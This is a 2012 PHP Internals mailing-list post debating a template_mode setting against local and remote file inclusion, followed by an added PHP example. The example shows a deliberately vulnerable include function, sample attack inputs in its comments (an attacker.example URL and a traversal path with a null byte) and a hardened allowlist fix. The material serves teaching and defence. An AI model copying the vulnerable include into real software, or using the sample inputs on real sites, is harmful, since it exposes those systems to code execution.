Hi,

2012/4/10 Luke Scott <l...@cywh.com>:
> On Apr 9, 2012, at 10:03 PM, Yasuo Ohgaki <yohg...@ohgaki.net> wrote:
>
>> I strongly discourage setting allow_url_include=on, too.
>
> Good.
>
>> Enabling it only when it is needed is okay.
>
> No it's not. There is no reason to do so other than backwards
> compatibility for very old code.
>
>> I think you are concerned about security,
>
> Absolutely.
>
>> so you could agree to have an
>> option for disabling embedded mode, couldn't you?
>
> Sure it can be an option. But it can't be the default, at least right
> away. It's unreasonable. I would prefer an environmental variable to
> choose the mode though. I'm not opposed to a php.ini option, but some
> people are
>
> (If by embedded mode you mean template mode, and non-embedded mode as
> "pure code mode").
>
> I still fail to see what this has to do with allow_url_include.

"allow_url_include" and "template_mode" are similar to me.

allow_url_include: enable only when url include is needed.
template_mode:    enable only when template mode is needed.

allow_url_include prevents RFI, which may result in a critical security incident.
template_mode prevents LFI, which may result in a critical security incident.

Note: template_mode=off is script only mode. On is current behavior.

>
>> Letting programmers decide what to do
>
> Not in all cases.
>
>> Programming languages should give the freedom to write suicide code,
>> more or less.
>
> No, it shouldn't.
>
> All that you've said comes down to this:
>
> Don't write bad code. Configure your web server properly.

Wouldn't it be the same for allow_url_include?
One could argue the same way for it.

> The RFC isn't meant to address these issues, and quite frankly it
> isn't a core PHP issue. It's no different than any language with an
> eval() statement.

I suppose you have missed the SQL injection and LFI vulnerability
discussion. LFI's true risk is misunderstood by many people,
just like the session adoption risk (which I'm willing to fix as well).

Note that SQL injection and LFI are common vulnerabilities
in PHP applications.

Please read the RFC on how SQL injection is related to LFI.

https://wiki.php.net/rfc/nophptags

template_mode is much like allow_url_include.
If users follow the guideline, it eliminates the LFI risk, just like RFI.

>
> Keep in mind an RFC isn't gospel. And it's still being drafted. We
> need to give Tom a chance to finish it.

I'm the one who listed it under discussion :)

Regards,

--
Yasuo Ohgaki
yohg...@ohgaki.net

--
PHP Internals - PHP Runtime Development Mailing List
To unsubscribe, visit: http://www.php.net/unsub.php
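The include pattern the thread is arguing about, as an added example that is not code from the thread, the RFC or PHP itself: the first function is the classic vulnerable shape (with allow_url_include=On it is RFI, and even with it Off it is LFI against any file an attacker can place on disk, since PHP scans an included file for `<?php` tags wherever they appear). The second resolves the page name against an allowlist and checks the canonicalised path stays under the template directory. The `page` parameter, the page names and the `templates` directory are assumptions made for the example.

```php
<?php
// Added example, not from the mailing-list thread or the nophptags RFC.
// The "page" query parameter, the page names and the templates directory
// are assumptions chosen for illustration.

declare(strict_types=1);

// --- Vulnerable: include path built straight from user input -----------
// allow_url_include=On  : ?page=http://attacker.example/shell  -> RFI
// allow_url_include=Off : ?page=../../uploads/avatar.jpg%00   -> LFI
// (the trailing ".php" is the only obstacle, and older PHP honoured the
// null byte; an attacker-controlled file with <?php ... ?> inside a JPEG
// is executed because PHP runs in "template mode" for every include).
function render_vulnerable(array $query, string $templateDir): void
{
    $page = $query['page'] ?? 'home';
    include $templateDir . '/' . $page . '.php';
}

// --- Hardened: allowlist first, then verify the canonical path ---------
function resolve_template(string $page, string $templateDir): ?string
{
    // 1. Only a fixed vocabulary of page names is accepted at all.
    $allowed = ['home', 'about', 'contact'];
    if (!in_array($page, $allowed, true)) {
        return null;
    }

    // 2. Canonicalise and confirm the result still lies inside the
    //    template directory. This catches "../" and symlink tricks if the
    //    allowlist is ever loosened or the directory is misconfigured.
    $base = realpath($templateDir);
    $path = realpath($templateDir . '/' . $page . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

function render_hardened(array $query, string $templateDir): void
{
    $path = resolve_template((string)($query['page'] ?? 'home'), $templateDir);
    if ($path === null) {
        http_response_code(404);
        echo 'No such page';
        return;
    }
    include $path;
}

// The ini guard belongs in php.ini (allow_url_include = Off is the default),
// but failing loudly at startup turns a misconfigured host into a visible
// error instead of a silent RFI exposure.
function assert_safe_ini(): void
{
    if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
        throw new RuntimeException('allow_url_include must be Off');
    }
}

assert_safe_ini();
render_hardened($_GET, __DIR__ . '/templates');
```

The allowlist is what actually removes the LFI: the realpath containment check is a second line of defence, not a substitute, because an attacker who can write inside the template directory (for example via an upload handler that shares it) still gets code execution through a path that passes the prefix test.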